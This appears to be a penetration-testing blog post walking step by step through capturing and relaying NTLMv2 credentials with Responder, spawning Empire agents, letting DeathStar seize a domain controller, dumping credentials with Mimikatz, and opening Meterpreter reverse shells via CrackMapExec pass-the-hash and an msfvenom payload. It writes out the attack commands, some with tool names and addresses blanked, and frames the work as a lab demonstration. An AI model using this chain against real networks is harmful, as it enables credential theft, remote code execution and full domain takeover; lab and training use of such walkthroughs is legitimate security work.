Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

What I’m using:



Deathstar (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way while doing a penetration test. The problem is that NTLMv2 hashes cannot be passed (but regular NTLM can) and if your dictionary isn’t good or they enforce a strict password with numbers and special characters, you’ll be sitting with an NTLMv2 Hash and username and nothing to do. However, there is the option of relaying that username & hash. The nasty thing about this is NTLM Relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What gets even worse is there’s a few tools that can automate the entire damn thing.

Now before I get started there’s a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali due to the python requests not wanting to negotiate any version of TLS less than 1.2.
  2. This first part of this process is assuming that NTLM relaying is possible, which if SMB signing is enabled, this entire operation is dead in the water. By default, it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent on a machine by any ways possible, Deathstar will do its stuff. It doesn’t NEED NTLM relaying, this is just an interesting way of getting an Empire agent.
  3. I’m doing this on my lab network, not someone else’s. This demo is simulating what can happen if LLMNR spoofing is possible and a domain admin credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do and I encourage you to read about it’s capabilities here.

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./ --listener-ip -t 100

ds1Listener IP will be whatever IP Empire is listening on. –t 100 means I’m giving it 100 threads to run, so it’s faster.

Next, I generate the powershell script from Empire. To do this, go to the listener module in Empire by typing in



From here, I create the payload by using the command

launcher powershell Deathstar


Copy the powershell script as you’ll paste it in a minute.

Next, I set up (Guide to set up here)

sudo -t -c 'powershell -noP -sta -w 1 -enc  [powershell code]’

ds4 also supports files with the –tf switch, so you can put in multiple targets if you wanted. Keep note that the powershell script must be in quotes or else it won’t run.

Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP


Finally, start up Responder

sudo python -I ens33 -r -d –v


My screen then looks like this once it’s all set up.


Next, using my Windows machine, I simulate the domain admin mistyping a share, generating a LLMNR request.


Poisoned answer is then sent via Responder


NTLMv2 hashed credentials are relayed


Empire agent opened


Deathstar automatically starts doing its thing


Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.


An Empire agent is now running on the DC


The final step is to get a shell.

There’s many ways to do this

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more, research it.


Using Mimikatz & Crackmapexec to open Meterpreter Shell

First is to interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is domain admin, SYSTEM is still a higher privilege.

interact [agent name]


Then run mimikatz



After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing


and a nice table is shown.


As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First set up multi/handlerds18

Then run crackmapexec. Even though I have the password in plain text, I’m demonstrating the hash here to show PTH is possible.

crackmapexec -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST= LPORT=4443




Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4443 -f exe > shell.exe


Copy the .exe into the Empire directory


Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe


Grats on shell


There’s many many more ways to escalate from an agent to a shell, but these are two of the easiest, albeit uploading an executable is not the stealthiest and probably the least recommended, but a shell is a shell.


Extra Resources and credit for Deathstar & Crackmapexec:

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a website or blog at

Up ↑

%d bloggers like this: